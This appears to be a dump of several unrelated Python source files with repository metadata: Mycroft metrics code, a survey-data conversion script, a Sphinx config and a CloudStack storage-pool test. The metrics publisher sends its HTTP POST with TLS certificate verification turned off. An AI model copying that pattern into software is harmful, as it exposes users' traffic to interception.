6f8bae6ba136c9dd66ca47aaadd75e214d006190
|
[
"Apache-2.0"
] | 4
|
2021-06-08T22:01:56.000Z
|
2022-03-12T00:41:15.000Z
|
mycroft/metrics/__init__.py
|
assistent-cat/mycroft-core
|
6f8bae6ba136c9dd66ca47aaadd75e214d006190
|
[
"Apache-2.0"
] | 2
|
2020-09-28T01:38:34.000Z
|
2020-12-03T03:14:32.000Z
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
from queue import Queue, Empty
import threading
import time
import requests
from mycroft.api import DeviceApi, is_paired
from mycroft.configuration import Configuration
from mycroft.session import SessionManager
from mycroft.util.log import LOG
from mycroft.version import CORE_VERSION_STR
from copy import copy
class _MetricSender(threading.Thread):
"""Thread responsible for sending metrics data."""
def __init__(self):
super().__init__()
self.queue = Queue()
self.daemon = True
self.start()
def run(self):
while True:
time.sleep(30)
try:
while True: # Try read the queue until it fails
report_metric(*self.queue.get_nowait())
time.sleep(0.5)
except Empty:
pass # If the queue is empty just continue the loop
except Exception as e:
LOG.error('Could not send Metrics: {}'.format(repr(e)))
_metric_uploader = _MetricSender()
def report_metric(name, data):
"""
Report a general metric to the Mycroft servers
Args:
name (str): Name of metric. Must use only letters and hyphens
data (dict): JSON dictionary to report. Must be valid JSON
"""
try:
if is_paired() and Configuration().get()['opt_in']:
DeviceApi().report_metric(name, data)
except requests.RequestException as e:
        LOG.error('Metric could not be uploaded due to a network error ({})'
.format(e))
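# A minimal usage sketch for report_metric(); it only uploads when the device
# is paired and the user has opted in (metric name and payload are examples):
#
#     report_metric('skill-invocation', {'skill': 'weather', 'count': 1})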
def report_timing(ident, system, timing, additional_data=None):
"""Create standardized message for reporting timing.
Arguments:
ident (str): identifier of user interaction
        system (str): system that generated the report
timing (stopwatch): Stopwatch object with recorded timing
additional_data (dict): dictionary with related data
"""
additional_data = additional_data or {}
report = copy(additional_data)
report['id'] = ident
report['system'] = system
report['start_time'] = timing.timestamp
report['time'] = timing.time
_metric_uploader.queue.put(('timing', report))
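# A minimal usage sketch for report_timing() together with the Stopwatch class
# defined below (the identifier, system name and handle_request() are illustrative):
#
#     stopwatch = Stopwatch()
#     with stopwatch:
#         handle_request()
#     report_timing('interaction-1234', 'speech', stopwatch,
#                   additional_data={'utterance_length': 12})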
class Stopwatch:
"""
Simple time measuring class.
"""
def __init__(self):
self.timestamp = None
self.time = None
def start(self):
"""
Start a time measurement
"""
self.timestamp = time.time()
def lap(self):
cur_time = time.time()
start_time = self.timestamp
self.timestamp = cur_time
return cur_time - start_time
def stop(self):
"""
        Stop a running time measurement and return the measured time.
"""
cur_time = time.time()
start_time = self.timestamp
self.time = cur_time - start_time
return self.time
def __enter__(self):
"""
Start stopwatch when entering with-block.
"""
self.start()
def __exit__(self, tpe, value, tb):
"""
Stop stopwatch when exiting with-block.
"""
self.stop()
def __str__(self):
cur_time = time.time()
if self.timestamp:
return str(self.time or cur_time - self.timestamp)
else:
return 'Not started'
class MetricsAggregator:
"""
MetricsAggregator is not threadsafe, and multiple clients writing the
same metric "concurrently" may result in data loss.
"""
def __init__(self):
self._counters = {}
self._timers = {}
self._levels = {}
self._attributes = {}
self.attr("version", CORE_VERSION_STR)
def increment(self, name, value=1):
cur = self._counters.get(name, 0)
self._counters[name] = cur + value
    def timer(self, name, value):
        cur = self._timers.get(name)
        if not cur:
            cur = self._timers[name] = []
        cur.append(value)
def level(self, name, value):
self._levels[name] = value
def clear(self):
self._counters = {}
self._timers = {}
self._levels = {}
self._attributes = {}
self.attr("version", CORE_VERSION_STR)
def attr(self, name, value):
self._attributes[name] = value
def flush(self):
publisher = MetricsPublisher()
payload = {
'counters': self._counters,
'timers': self._timers,
'levels': self._levels,
'attributes': self._attributes
}
self.clear()
count = (len(payload['counters']) + len(payload['timers']) +
len(payload['levels']))
if count > 0:
# LOG.debug(json.dumps(payload))
def publish():
publisher.publish(payload)
threading.Thread(target=publish).start()
class MetricsPublisher:
def __init__(self, url=None, enabled=False):
conf = Configuration().get()['server']
self.url = url or conf['url']
self.enabled = enabled or conf['metrics']
def publish(self, events):
if 'session_id' not in events:
session_id = SessionManager.get().session_id
events['session_id'] = session_id
if self.enabled:
requests.post(
self.url,
headers={'Content-Type': 'application/json'},
data=json.dumps(events), verify=False)
| 28.853081
| 77
| 0.600197
|
795002b748adfab2457ef4a06efc49bada9cbf79
| 3,294
|
py
|
Python
|
data/consumer_expenditures/raw/convert_CE_data.py
|
srnnkls/getml-examples
|
45d179928ce6d7dccb2848b37c709b1dae0081e0
|
[
"MIT"
] | null | null | null |
data/consumer_expenditures/raw/convert_CE_data.py
|
srnnkls/getml-examples
|
45d179928ce6d7dccb2848b37c709b1dae0081e0
|
[
"MIT"
] | null | null | null |
data/consumer_expenditures/raw/convert_CE_data.py
|
srnnkls/getml-examples
|
45d179928ce6d7dccb2848b37c709b1dae0081e0
|
[
"MIT"
] | null | null | null |
## This script imports the CE data and reformats it so that it is much
## easier to handle in the getting started guide.
import datetime
import os
import numpy as np
import pandas as pd
## -------------------------------------------------------------------
## Setup
# The folder that contains all required .csv files.
RAW_DATA_FOLDER = "./"
## -------------------------------------------------------------------
## Read the data from the source files
expd = pd.read_csv(os.path.join(RAW_DATA_FOLDER, "expd151.csv"))
expd = expd.append(pd.read_csv(os.path.join(RAW_DATA_FOLDER, "expd152.csv")))
expd = expd.append(pd.read_csv(os.path.join(RAW_DATA_FOLDER, "expd153.csv")))
expd = expd.append(pd.read_csv(os.path.join(RAW_DATA_FOLDER, "expd154.csv")))
# -----------------------------------------------------------------------------
# Set up target - we want to predict whether the item is a gift
expd["TARGET"] = [0.0 if elem == 2 else 1.0 for elem in expd["GIFT"]]
# -----------------------------------------------------------------------------
# Remove the instances where date is nan - they will be ignored by the Multirel
# engine anyway, because of the NULL value handling policy.
expd = expd[
(expd["EXPNYR"] == expd["EXPNYR"]) & (expd["EXPNMO"] == expd["EXPNMO"])
]
# -----------------------------------------------------------------------------
# Set up date - TIME_STAMP_SHIFTED exists to make sure only data up to the
# PREVIOUS month is used.
expd["TIME_STAMP"] = [
datetime.datetime(int(year), int(month), 1) for year, month in zip(expd["EXPNYR"], expd["EXPNMO"])
]
expd["TIME_STAMP_SHIFTED"] = [
datetime.datetime(int(year), int(month), 15) for year, month in zip(expd["EXPNYR"], expd["EXPNMO"])
]
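# For example, a row with EXPNYR = 2015 and EXPNMO = 3 gets
# TIME_STAMP = 2015-03-01 and TIME_STAMP_SHIFTED = 2015-03-15.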
# -----------------------------------------------------------------------------
# Set up "BASKETID"
expd["BASKETID"] = [
str(x) + "_" + y.strftime("%Y-%m") for x, y in zip(expd["NEWID"], expd["TIME_STAMP"])
]
# -----------------------------------------------------------------------------
# Build a training, validation and testing flag. We will use January to August
# for training, September and October for validation and November and December
# for testing. If you decide to add more data, you should probably come up
# with your own way of separating the data.
expd["Stage"] = [
"Testing" if month > 10.0 else
"Validation" if month > 8.0 else
"Training" for month in expd["EXPNMO"]
]
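# For example, EXPNMO = 12.0 maps to "Testing", 9.0 to "Validation" and 5.0 to "Training".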
# -----------------------------------------------------------------------------
# Set up UCCs - the UCCs are a way to systematically categorize products.
# Every digit has significance. That is why we create extra columns
# that contain the first digit, the first two digits and so on.
ucc = np.asarray(expd["UCC"]).astype(str)
expd["UCC1"] = [elem[:1] for elem in ucc]
expd["UCC2"] = [elem[:2] for elem in ucc]
expd["UCC3"] = [elem[:3] for elem in ucc]
expd["UCC4"] = [elem[:4] for elem in ucc]
expd["UCC5"] = [elem[:5] for elem in ucc]
## -------------------------------------------------------------------
## Export data into new .csv files.
expd[expd["Stage"] == "Training"].to_csv("../CE_population_training.csv")
expd[expd["Stage"] == "Validation"].to_csv("../CE_population_validation.csv")
expd.to_csv("../CE_peripheral.csv")
| 37.862069
| 103
| 0.549787
|
795003e5f15f8f992f531ccda78dc10090e9e051
| 8,415
|
py
|
Python
|
docs/conf.py
|
novafloss/django-i18nurl
|
0c7d5505154dd8f3c1c78e64d6c3dbc33a63fa8b
|
[
"BSD-3-Clause"
] | null | null | null |
docs/conf.py
|
novafloss/django-i18nurl
|
0c7d5505154dd8f3c1c78e64d6c3dbc33a63fa8b
|
[
"BSD-3-Clause"
] | null | null | null |
docs/conf.py
|
novafloss/django-i18nurl
|
0c7d5505154dd8f3c1c78e64d6c3dbc33a63fa8b
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# django-i18nurl documentation build configuration file, created by
# sphinx-quickstart on Mon Aug 27 11:37:23 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# Minimal Django settings. Required to use sphinx.ext.autodoc, because
# django-i18nurl depends on Django...
from django.conf import settings
settings.configure(
DATABASES={}, # Required to load ``django.views.generic``.
)
doc_dir = os.path.dirname(os.path.abspath(__file__))
project_dir = os.path.dirname(doc_dir)
version_filename = os.path.join(project_dir, 'VERSION')
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.autosummary',
'sphinx.ext.doctest', 'sphinx.ext.coverage']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.txt'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'django-i18nurl'
copyright = u'2013, Novapost'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = open(version_filename).read().strip()
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
language = 'en'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
html_sidebars = {
'**': ['globaltoc.html',
'relations.html',
'sourcelink.html',
'searchbox.html'],
}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'django-i18nurldoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'django-i18nurl.tex', u'django-i18nurl Documentation',
u'Novapost', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'django-i18nurl', u'django-i18nurl Documentation',
[u'Novapost'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'django-i18nurl', u'django-i18nurl Documentation',
u'Novapost', 'django-i18nurl', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| 31.754717
| 80
| 0.712894
|
795003eec7257fcd8190b74ce5ba4d88f2aab131
| 70,897
|
py
|
Python
|
test/integration/component/maint/testpath_disablestoragepool.py
|
ycyun/ablestack-cloud
|
b7bd36a043e2697d05303246373988aa033c9229
|
[
"Apache-2.0"
] | 1,131
|
2015-01-08T18:59:06.000Z
|
2022-03-29T11:31:10.000Z
|
test/integration/component/maint/testpath_disablestoragepool.py
|
ycyun/ablestack-cloud
|
b7bd36a043e2697d05303246373988aa033c9229
|
[
"Apache-2.0"
] | 5,908
|
2015-01-13T15:28:37.000Z
|
2022-03-31T20:31:07.000Z
|
test/integration/component/maint/testpath_disablestoragepool.py
|
ycyun/ablestack-cloud
|
b7bd36a043e2697d05303246373988aa033c9229
|
[
"Apache-2.0"
] | 1,083
|
2015-01-05T01:16:52.000Z
|
2022-03-31T12:14:10.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Utilities functions
"""
# All tests inherit from cloudstack TestCase
from marvin.cloudstackTestCase import cloudstackTestCase
import unittest
from marvin.codes import FAILED, PASS
from marvin.lib.base import (Account,
VirtualMachine,
ServiceOffering,
User,
DiskOffering,
Volume,
Template,
VmSnapshot,
StoragePool,
Host,
Capacities)
from marvin.lib.utils import cleanup_resources, validateList
from marvin.lib.common import (get_zone,
get_domain,
list_clusters,
get_template,
list_volumes,
list_virtual_machines)
from nose.plugins.attrib import attr
from ddt import ddt, data
def verify_vm_state(self, vmid, state):
list_vm = list_virtual_machines(self.userapiclient,
account=self.account.name,
domainid=self.account.domainid,
id=vmid)
self.assertEqual(
validateList(list_vm)[0],
PASS,
'Check List vm response for vmid: %s' %
vmid)
self.assertGreater(
len(list_vm),
0,
'Check the list vm response for vm id: %s' %
vmid)
vm = list_vm[0]
self.assertEqual(
vm.id,
str(vmid),
'Vm deployed is different from the test')
self.assertEqual(vm.state, state, 'VM is not in %s state' % state)
self.debug('VM is in is %s state' % state)
def verify_pool_state(self, poolid, state):
list_storage_pool_response = StoragePool.list(
self.userapiclient, id=poolid)
self.assertGreater(len(list_storage_pool_response), 0,
'Check list pool response is greater than 0')
self.assertEqual(
list_storage_pool_response[0].state,
state,
'Storage pool is not in %s state' %
state)
def verify_vm_storage_pool(self, vmid, storageid):
root_volume = Volume.list(
self.userapiclient,
virtualmachineid=vmid,
type='ROOT')[0]
list_volume = Volume.list(self.userapiclient, id=root_volume.id)
self.assertEqual(
list_volume[0].storageid,
storageid,
'check list volume response for Storage id: % s ' %
storageid)
@ddt
class TestPathDisableStorage_Basic(cloudstackTestCase):
"""
    # Tests in this path are required to be run independently
    # (not in parallel with any other tests, since they involve disabling/enabling storage pools
    # and may cause unexpected failures in other tests).
    # The tests also require 2 cluster-wide and 2 zone-wide storage pools to be available in the setup.
    # For running the tests on local storage, ensure there are 2 local storage pools set up on each host.
"""
@classmethod
def setUpClass(cls):
testClient = super(
TestPathDisableStorage_Basic,
cls).getClsTestClient()
cls.apiclient = testClient.getApiClient()
cls.testdata = testClient.getParsedTestDataConfig()
cls.domain = get_domain(cls.apiclient)
cls.zone = get_zone(cls.apiclient)
cls.testdata['mode'] = cls.zone.networktype
cls.template = get_template(
cls.apiclient,
cls.zone.id,
cls.testdata['ostype'])
        if cls.template == FAILED:
            cls.fail(
                'get_template() failed to return template with description %s'
                % cls.testdata['ostype'])
        cls.testdata['template']['ostypeid'] = cls.template.ostypeid
cls._cleanup = []
cls.disabled_list = []
cls.testdata['template_2']['zoneid'] = cls.zone.id
cls.testdata['template_2']['ostypeid'] = cls.template.ostypeid
cls.hypervisor = testClient.getHypervisorInfo()
try:
cls.debug('Creating account')
cls.account = Account.create(cls.apiclient,
cls.testdata['account'],
admin=True
)
cls._cleanup.append(cls.account)
except Exception as e:
cls.tearDownClass()
raise e
# Create shared storage offerings
cls.service_offering_shared = ServiceOffering.create(
cls.apiclient, cls.testdata['service_offering'])
cls._cleanup.append(cls.service_offering_shared)
cls.disk_offering_shared = DiskOffering.create(
cls.apiclient, cls.testdata['disk_offering'])
cls.resized_disk_offering = DiskOffering.create(
cls.apiclient, cls.testdata['resized_disk_offering'])
cls._cleanup.append(cls.disk_offering_shared)
# Create offerings for local storage if local storage is enabled
if cls.zone.localstorageenabled:
cls.testdata["service_offerings"]["tiny"]["storagetype"] = 'local'
cls.service_offering_local = ServiceOffering.create(
cls.apiclient, cls.testdata["service_offerings"]["tiny"])
cls._cleanup.append(cls.service_offering_local)
cls.testdata["disk_offering"]["storagetype"] = 'local'
cls.disk_offering_local = DiskOffering.create(
cls.apiclient, cls.testdata["disk_offering"])
cls._cleanup.append(cls.disk_offering_local)
cls.testdata["disk_offering"]["storagetype"] = ' '
cls.testdata["service_offerings"]["tiny"]["storagetype"] = ' '
else:
cls.debug("No local storage found")
cls.userapiclient = testClient.getUserApiClient(
UserName=cls.account.name, DomainName=cls.account.domain)
response = User.login(cls.userapiclient,
username=cls.account.name,
password=cls.testdata['account']['password']
)
assert response.sessionkey is not None
@classmethod
def tearDownClass(cls):
try:
cleanup_resources(cls.apiclient, cls._cleanup)
except Exception as e:
raise Exception('Warning:Exception during cleanup: %s' % e)
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.cleanup = []
def tearDown(self):
if self.disabled_list:
for poolid in self.disabled_list:
if StoragePool.list(
self.userapiclient,
id=poolid)[0].state != 'Up':
try:
StoragePool.update(
self.userapiclient, id=poolid, enabled=True)
self.debug('Enabling: % s ' % poolid)
except Exception as e:
self.fail("Couldn't enable storage % s" % id)
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
self.fail('Warning: Exception during cleanup : %s' % e)
@data('host', 'CLUSTER', 'ZONE')
@attr(tags=['advanced', 'advancedsg', 'basic'], required_hardware='false')
def test_01_disable_enable_pool(self, value):
"""
Test Steps:
=========
1. Deploy 2 VMs
2. Stop VM2
3. Disable storage pool SP1
4. Try to deploy a new VM, should fail
5. Start VM2 which was stopped, should run from same pool
6. Remove disabled Storage pool SP1, should fail
7. Enable storage pool SP1
8. Deploy new VM, VM4 - should succeed
9. Create and attach new disk to VM4
10. Disable storage pool SP1 again and enable new pool
11. Deploy new VM, VM5 - should succeed
12. Stop VM1 which is running from disabled pool
13. Migrate ROOT volume of VM1 to another enabled storage pool - should succeed
14. findStoragePoolsforMigration should not list the disabled pool
"""
# Choose appropriate service offering depending on the scope the test
# is being run on
self.disabled_list = []
if value == 'CLUSTER':
other_scope = 'ZONE'
self.service_offering = self.service_offering_shared
self.disk_offering = self.disk_offering_shared
elif value == 'ZONE':
other_scope = 'CLUSTER'
self.service_offering = self.service_offering_shared
self.disk_offering = self.disk_offering_shared
elif value == 'host':
# local storage
other_scope = None
if self.zone.localstorageenabled:
self.service_offering = self.service_offering_local
self.disk_offering = self.disk_offering_local
else:
self.skipTest("Local storage not enabled")
# Keep only one pool active and disable the rest
try:
self.list_storage = StoragePool.list(
self.userapiclient, scope=value)
if self.list_storage:
count_st_pools = len(self.list_storage)
else:
count_st_pools = 0
self.disabled_pool_1 = None
if count_st_pools > 1:
self.debug(
'Found % s storage pools, keeping one and disabling rest' %
count_st_pools)
for pool in self.list_storage[1:]:
self.disabled_pool_1 = self.list_storage[1]
if pool.state == 'Up':
self.debug('Trying to disable storage %s' % pool.id)
try:
StoragePool.update(
self.userapiclient, id=pool.id, enabled=False)
self.disabled_list.append(pool.id)
self.debug(
'Appended to list of disabled pools. List is now: % s ' %
self.disabled_list)
except Exception as e:
raise e
elif count_st_pools == 1:
self.debug(
'Only one % s wide storage found - will not be able to complete all tests' %
value)
else:
self.skipTest('No % s storage pools found' % value)
except Exception as e:
raise e
# Disable the other scope shared storage pools while we are testing on
# one - applicable for only shared storage
if value != 'host':
try:
self.list_storage = StoragePool.list(
self.userapiclient, scope=other_scope)
if self.list_storage:
for pool in self.list_storage:
if pool.state == 'Up':
self.debug(
'Trying to disable storage % s' %
pool.id)
try:
StoragePool.update(
self.userapiclient, id=pool.id, enabled=False)
self.disabled_list.append(pool.id)
self.debug(
'Appended to list of disabled pools. List is now: % s ' %
self.disabled_list)
except Exception as e:
self.fail(
"Couldn't disable storage % s" % pool.id)
else:
self.debug('No % s wide storage pools found' % other_scope)
except Exception as e:
raise e
# Step 1: Deploy 2 VMs
self.virtual_machine_1 = VirtualMachine.create(
self.userapiclient,
self.testdata['small'],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
zoneid=self.zone.id)
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
self.virtual_machine_2 = VirtualMachine.create(
self.userapiclient,
self.testdata['small'],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
zoneid=self.zone.id)
verify_vm_state(self, self.virtual_machine_2.id, 'Running')
# Step 2: Keep one VM in stopped state while other keeps running
try:
self.debug('Step 2: Stopping one of the VMs')
self.virtual_machine_2.stop(self.userapiclient)
verify_vm_state(self, self.virtual_machine_2.id, 'Stopped')
except Exception as e:
self.fail('Step 2: Failed to stop VM: %s' % e)
# Step 3: Disable the Storage Pool, verify VMs are in same state as
# before
self.storage_pools_list = StoragePool.list(
self.userapiclient, scope=value, state='Up')
self.storage_pool_1 = self.storage_pools_list[0]
try:
self.debug(
'Step 3: Disabling Storage Pool: %s' %
self.storage_pool_1.id)
StoragePool.update(
self.userapiclient,
id=self.storage_pool_1.id,
enabled=False)
except Exception as e:
self.debug("Step 3: Couldn't disable pool %s" % e)
verify_pool_state(self, self.storage_pool_1.id, 'Disabled')
verify_vm_state(self, self.virtual_machine_1.id, 'Running')
verify_vm_state(self, self.virtual_machine_2.id, 'Stopped')
# Step 4: Deploying new VM on disabled pool should fail
self.debug(
'Step 4: Trying to deploy VM on disabled storage - should fail')
with self.assertRaises(Exception):
VirtualMachine.create(self.userapiclient,
self.testdata['small'],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
zoneid=self.zone.id)
# Step 5: Should be able to start VM on disabled pool
try:
self.virtual_machine_2.start(self.userapiclient)
verify_vm_state(self, self.virtual_machine_2.id, 'Running')
verify_vm_storage_pool(
self,
self.virtual_machine_2.id,
self.storage_pool_1.id)
except Exception as e:
self.fail('Step 5: Failed to start VM: %s' % e)
# Step 6: Removing disabled pool should fail
self.debug('Step 6: Trying to remove disabled storage pool')
with self.assertRaises(Exception):
StoragePool.delete(self.userapiclient, self.storage_pool_1.id)
# Step 7: Enable Storage pool
try:
self.debug(
'Step 7: Enabling Storage Pool: %s' %
self.storage_pool_1.id)
StoragePool.update(
self.userapiclient,
id=self.storage_pool_1.id,
enabled=True)
except Exception as e:
self.debug("Step 7: Couldn't enable pool %s" % e)
verify_pool_state(self, self.storage_pool_1.id, 'Up')
# Step 8: Deploy a VM on the pool
self.virtual_machine_3 = VirtualMachine.create(
self.userapiclient,
self.testdata['small'],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
zoneid=self.zone.id)
verify_vm_state(self, self.virtual_machine_3.id, 'Running')
if self.hypervisor.lower() == 'lxc':
self.skipTest("Not running rest of tests in lxc")
# Step 9: Create and attach new disk to VM
self.volume = Volume.create(self.userapiclient,
services=self.testdata['volume'],
diskofferingid=self.disk_offering.id,
zoneid=self.zone.id)
list_volume = Volume.list(
self.userapiclient,
id=self.volume.id,
accountid=self.account.name,
domainid=self.account.domainid)
self.assertEqual(
validateList(list_volume)[0],
PASS,
'Step 9: Check List volume response for volume %s' %
self.volume.id)
self.assertEqual(
list_volume[0].id,
self.volume.id,
'Step 9: check list volume response for volume id: %s' %
self.volume.id)
self.debug(
'Step 9: volume id %s got created successfully' %
list_volume[0].id)
self.virtual_machine_3.attach_volume(self.userapiclient, self.volume)
list_volume = Volume.list(self.userapiclient, id=self.volume.id)
self.assertEqual(
list_volume[0].virtualmachineid,
self.virtual_machine_3.id,
'Step 9: Check if volume state (attached) is reflected')
self.debug(
'Step 9: volume id:%s successfully attached to vm id%s' %
(self.volume.id, self.virtual_machine_3.id))
if self.disabled_pool_1:
newpoolid = self.disabled_pool_1.id
else:
self.skipTest(
'Step 9: Could not find a second storage pool to complete the remaining tests')
# Step 10: Disable storage pool SP1 again and enable new pool
try:
StoragePool.update(self.userapiclient, id=newpoolid, enabled=True)
except Exception as e:
            self.fail('Step 10: Enabling storage pool failed: %s' % e)
verify_pool_state(self, newpoolid, 'Up')
try:
self.debug(
'Step 10: Disabling Storage Pool: %s' %
self.storage_pool_1.id)
StoragePool.update(
self.userapiclient,
id=self.storage_pool_1.id,
enabled=False)
self.disabled_list.append(self.storage_pool_1.id)
self.debug(
'Step 10: Appended to list of disabled pools. List is now: % s ' %
self.disabled_list)
except Exception as e:
self.debug("Step 10: Couldn't disable pool %s" % e)
verify_pool_state(self, self.storage_pool_1.id, 'Disabled')
# Step 11: Deploy new VM, VM5 - should succeed
self.virtual_machine_4 = VirtualMachine.create(
self.userapiclient,
self.testdata['small'],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
zoneid=self.zone.id)
verify_vm_state(self, self.virtual_machine_4.id, 'Running')
# Step 12: Stop VM1 which is running from disabled pool
self.virtual_machine_1.stop(self.userapiclient)
verify_vm_state(self, self.virtual_machine_1.id, 'Stopped')
# Step 13: Migrate ROOT volume of VM1 to another enabled storage pool -
# should succeed
if value != 'host':
root_volume = Volume.list(
self.userapiclient,
virtualmachineid=self.virtual_machine_1.id,
type='ROOT')
try:
Volume.migrate(
self.userapiclient,
volumeid=root_volume[0].id,
storageid=newpoolid)
except Exception as e:
raise e
list_volume = list_volumes(
self.userapiclient, id=root_volume[0].id)
self.assertEqual(
isinstance(
list_volume,
list),
True,
'Step 13: Check list volumes response for valid list')
# Step 14: findStoragePoolsforMigration should not list the disabled
# pool
if value != 'host':
pools_for_migration = StoragePool.listForMigration(
self.userapiclient, id=root_volume[0].id)
self.debug(
'Step 14: List of pools suitable for migration: % s ' %
pools_for_migration)
if pools_for_migration:
if self.storage_pool_1 in pools_for_migration:
self.fail(
'Step 14: Storage pool % s is supposed to be disabled and not suitable for migration, \
but found in the list of pools suitable for migration' %
self.storage_pool_1.id)
@data('host', 'CLUSTER', 'ZONE')
@attr(tags=['advanced', 'advancedsg', 'basic'], required_hardware='false')
def test_02_vm_operations_on_disabled_pool(self, value):
"""
Test Steps:
=========
1. Deploy a VM and attach volume
2. Disable Storage
3. Create Template from root volume of the VM
4. Attach a new volume - should fail
